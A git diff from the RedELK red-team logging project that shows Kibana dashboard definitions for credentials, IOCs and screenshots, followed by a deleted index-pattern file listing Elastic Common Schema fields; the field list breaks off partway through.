"id": "85446c80-d04b-11ea-9301-a30a04251ae9", - "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", - "type": "visualization" - }, - { - "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", - "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", - "type": "visualization" - }, - { - "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", - "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", - "type": "visualization" - }, - { - "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", - "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", - "type": "search" - } - ], - "sort": [ - 1643016103992, - 297 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "RedELK credentials dashboard", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", - "w": 24, - "x": 0, - "y": 2 - }, - "panelIndex": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", - "panelRefName": "panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", - "title": "Credentials over time", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "8c5ea210-ef6d-47a3-958b-16ccc6006582", - "w": 7, - "x": 24, - "y": 2 - }, - "panelIndex": "8c5ea210-ef6d-47a3-958b-16ccc6006582", - "panelRefName": "panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", - "title": "Total credentials", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "b98cc0b8-ee93-4d34-b458-cd311eb995ea", - "w": 17, - "x": 31, - "y": 2 - }, - "panelIndex": "b98cc0b8-ee93-4d34-b458-cd311eb995ea", - "panelRefName": "panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", - "title": "Credentials realms", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 19, - "i": "77f94499-3c4b-49c0-8379-62d38f4d7d8e", - "w": 48, - "x": 0, - "y": 13 - }, - "panelIndex": "77f94499-3c4b-49c0-8379-62d38f4d7d8e", - "panelRefName": "panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", - "type": "search", - "version": "7.8.0" - } - ], - "timeRestore": false, - "title": "RedELK - Credentials dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "82b865a0-d318-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization" - }, - { - "id": "ab609c60-d319-11ea-9301-a30a04251ae9", - "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", - "type": "visualization" - }, - { - "id": "dcf86190-d319-11ea-9301-a30a04251ae9", - "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", - "type": "visualization" - }, - { - "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", - "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", - "type": "visualization" - }, - { - "id": "3fabe620-6c38-11ea-97d6-55783aed877a", - "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 85 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "RedELK IOC dashboard", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "dfd53850-c595-4597-bbb5-ea03fc22e880", - "w": 24, - "x": 0, - "y": 2 - }, - "panelIndex": "dfd53850-c595-4597-bbb5-ea03fc22e880", - "panelRefName": "panel_dfd53850-c595-4597-bbb5-ea03fc22e880", - "title": "IOC over time", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "f13deeb7-53dc-41af-9de0-486d7a171916", - "w": 17, - "x": 31, - "y": 2 - }, - "panelIndex": "f13deeb7-53dc-41af-9de0-486d7a171916", - "panelRefName": "panel_f13deeb7-53dc-41af-9de0-486d7a171916", - "title": "IOC Types", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", - "w": 7, - "x": 24, - "y": 2 - }, - "panelIndex": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", - "panelRefName": "panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 19, - "i": "d492599d-f662-450b-9982-54ab7db9f174", - "w": 48, - "x": 0, - "y": 13 - }, - "panelIndex": "d492599d-f662-450b-9982-54ab7db9f174", - "panelRefName": "panel_d492599d-f662-450b-9982-54ab7db9f174", - "type": "search", - "version": "7.8.0" - } - ], - "timeRestore": false, - "title": "RedELK - IOC dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization" - }, - { - "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", - "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", - "type": "visualization" - }, - { - "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", - "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", - "type": "visualization" - }, - { - "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", - "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", - "type": "visualization" - }, - { - "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", - "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 91 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "RedELK screenshots dashboard", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", - "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "d4eb5dce-3894-4599-8c17-042fc067d58c", - "w": 24, - "x": 0, - "y": 2 - }, - "panelIndex": "d4eb5dce-3894-4599-8c17-042fc067d58c", - "panelRefName": "panel_d4eb5dce-3894-4599-8c17-042fc067d58c", - "title": "Screenshots over time", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 19, - "i": "1db7741d-210a-4331-b1cb-affc6ac1334e", - "w": 48, - "x": 0, - "y": 13 - }, - "panelIndex": "1db7741d-210a-4331-b1cb-affc6ac1334e", - "panelRefName": "panel_1db7741d-210a-4331-b1cb-affc6ac1334e", - "type": "search", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", - "w": 7, - "x": 24, - "y": 2 - }, - "panelIndex": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", - "panelRefName": "panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", - "title": "Total screenshots", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "66403011-8fb6-402f-b9b6-5f503d6df704", - "w": 17, - "x": 31, - "y": 2 - }, - "panelIndex": "66403011-8fb6-402f-b9b6-5f503d6df704", - "panelRefName": "panel_66403011-8fb6-402f-b9b6-5f503d6df704", - "title": "Screenshots target users", - "type": "visualization", - "version": "7.8.0" - } - ], - "timeRestore": false, - "title": "RedELK - Screenshots dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", - "type": "visualization" - }, - { - "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", - "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", - "type": "visualization" - }, - { - "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", - "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", - "type": "search" - }, - { - "id": "389dddc0-d317-11ea-9301-a30a04251ae9", - "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", - "type": "visualization" - }, - { - "id": "659280b0-d317-11ea-9301-a30a04251ae9", - "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", - "type": "visualization" - } - ], - "sort": [ - 1642171876916, - 97 - ], - "type": "dashboard", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json deleted file mode 100644 index dc33d315..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json +++ /dev/null @@ -1,8685 +0,0 @@ -[ - { - "attributes": { - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.ephemeral_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "as.number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "as.organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "as.organization.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "as.organization.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.address", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "client.as.number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.as.organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "client.as.organization.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "client.as.organization.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "client.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "client.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "client.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "client.nat.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "client.nat.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "client.packets", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "client.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.registered_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.top_level_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.full_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "client.user.full_name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "client.user.full_name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "client.user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "client.user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "client.user.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.account.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.availability_zone", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.instance.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.instance.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.machine.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.provider", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "cloud.region", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "code_signature.exists", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "code_signature.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "code_signature.subject_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "code_signature.trusted", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "code_signature.valid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "container.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "container.image.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "container.image.tag", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "container.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "container.runtime", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.address", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "destination.as.number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.as.organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "destination.as.organization.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "destination.as.organization.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "destination.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "destination.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "destination.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "destination.nat.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "destination.nat.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "destination.packets", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "destination.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.registered_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.top_level_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.full_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "destination.user.full_name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "destination.user.full_name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "destination.user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "destination.user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "destination.user.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "dll.code_signature.exists", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - 